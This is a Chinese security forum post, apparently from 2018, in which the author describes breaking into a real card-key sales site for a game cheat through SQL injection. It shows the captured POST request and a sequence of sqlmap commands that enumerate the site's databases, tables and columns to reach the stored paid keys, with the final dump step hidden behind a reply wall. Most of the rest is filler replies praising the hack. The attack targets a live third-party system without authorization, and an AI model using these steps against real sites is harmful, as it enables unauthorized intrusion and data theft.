用户
搜索
  • TA的每日心情

    2018-3-2 07:59
  • 签到天数: 8 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    21

    主题

    214

    帖子

    930

    魔法币
    收听
    0
    粉丝
    51
    注册时间
    2017-4-15

    i春秋认证春秋文阁i春秋签约作者

    发表于 2018-2-2 12:55:41 41025063
    本帖最后由 jasonx 于 2018-2-2 14:19 编辑

    前言:某表哥发了一个某吃鸡外挂的发卡平台注入点,我个人对外挂没啥好感,毕竟太破坏游戏体验了,然后就顺手跑一下。

    0x01 sqlmap走起

    这是一个post注入,我们把通过burp抓到的请求复制到一个txt文件里面,然后放到c盘根目录下。

    [AppleScript] 纯文本查看 复制代码
    POST /index.php/Home/Index/ajaxname HTTP/1.1[/size]
    [size=3]Content-Length: 71[/size]
    [size=3]Content-Type: application/x-www-form-urlencoded[/size]
    [size=3]X-Requested-With: XMLHttpRequest[/size]
    [size=3]Referer: [url]http://10.10.10.10/[/url][/size]
    [size=3]Cookie: PHPSESSID=fhj6t4m3o79ov1n4dk36bn9413[/size]
    [size=3]Host: 10.10.10.10[/size]
    [size=3]Connection: Keep-alive[/size]
    [size=3]Accept-Encoding: gzip,deflate[/size]
    [size=3]User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21[/size]
    [size=3]Accept: */*[/size]
    
    [size=3]name=-1


    然后我们打开sqlmap 输入如下命令。
    [AppleScript] 纯文本查看 复制代码
    sqlmap.py -r c:\1.txt --data "name=-1" 


    2.jpg

    当如下提示的时候,我们输入Y然后回车继续。
    [AppleScript] 纯文本查看 复制代码
    are you really sure that you want to continue (sqlmap could have problems)? [y/N]


    稍等片刻后发现这里的确存在注入。

    9.jpg

    我们输入如下命令列出他的数据库名称
    [AppleScript] 纯文本查看 复制代码
    sqlmap.py -r c:\1.txt --data "name=-1" --dbs


    可以看到数据库已经出来了,他这个网站的数据库是第一个。

    3.jpg

    输入如下命令读出表名字
    [AppleScript] 纯文本查看 复制代码
    sqlmap.py -r c:\1.txt --data "name=-1" -D _ka_打码 --tables


    从下图可以看到,他的外挂卡密是存放在这个表里面。

    5.jpg

    输入以下命令读出这个表里面的所有字段
    [AppleScript] 纯文本查看 复制代码
    sqlmap.py -r c:\1.txt --data "name=-1" -D _ka_打码 -T zd_kami --columns


    6.jpg

    可以看到,所有字段都出来了。

    7.jpg

    0x02 直接导出所有卡密
    输入如下命令导出这些字段
    游客,如果您要查看本帖隐藏内容请回复










    Alex______ i春秋-呆萌菜鸟268#
    发表于 1 秒前
    魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔dfgf
    使用道具 举报 回复


    Alex______ i春秋-呆萌菜鸟268#
    发表于 1 秒前
    魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔123
    使用道具 举报 回复


    Alex______ i春秋-呆萌菜鸟268#
    发表于 1 秒前
    魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔123
    使用道具 举报 回复


    Alex______ i春秋-呆萌菜鸟268#
    发表于 1 秒前
    魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔
    使用道具 举报 回复


    Alex______ i春秋-呆萌菜鸟268#
    发表于 1 秒前
    魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔
    使用道具 举报 回复


    Alex______ i春秋-呆萌菜鸟268#
    发表于 1 秒前
    魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔
    使用道具 举报 回复
    看看                                 
    使用道具 举报 回复
    发表于 1 秒前
    魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔魔法笔dfgf
    使用道具 举报 回复
    沙发!!
    使用道具 举报 回复
    发表于 2018-2-2 14:06:19
    I just  want to see see
    使用道具 举报 回复
    发表于 2018-2-2 14:13:31
    楼主辛苦了 真是好人啊
    部分回复是自动回帖回的。
    使用道具 举报 回复
    发表于 2018-2-2 14:21:29
    膜拜。这就是大佬啊
    使用道具 举报 回复
    发表于 2018-2-2 14:29:15
    前排........
    使用道具 举报 回复
    发表于 2018-2-2 14:45:43
    使用道具 举报 回复

    楼主辛苦了 真是好人啊
    使用道具 举报 回复
    发表于 2018-2-2 14:52:21
    板凳!!!!
    使用道具 举报 回复

    I just  want to see see
    使用道具 举报 回复
    发表于 2018-2-2 15:00:57
    看看卡密嘿嘿
    使用道具 举报 回复
    Hacker1ee 安全团队 Zer0 Sec(零安全团队核心 i春秋认证 i春秋签约作者
    19#
    发表于 2018-2-2 15:06:36
    可以,这很黑客,支持TT
    Zero Security  Team
    使用道具 举报 回复

    I just  want to see see too!
    使用道具 举报 回复
    羡慕大佬,,,,,
    使用道具 举报 回复


    I just  want to see see too!
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册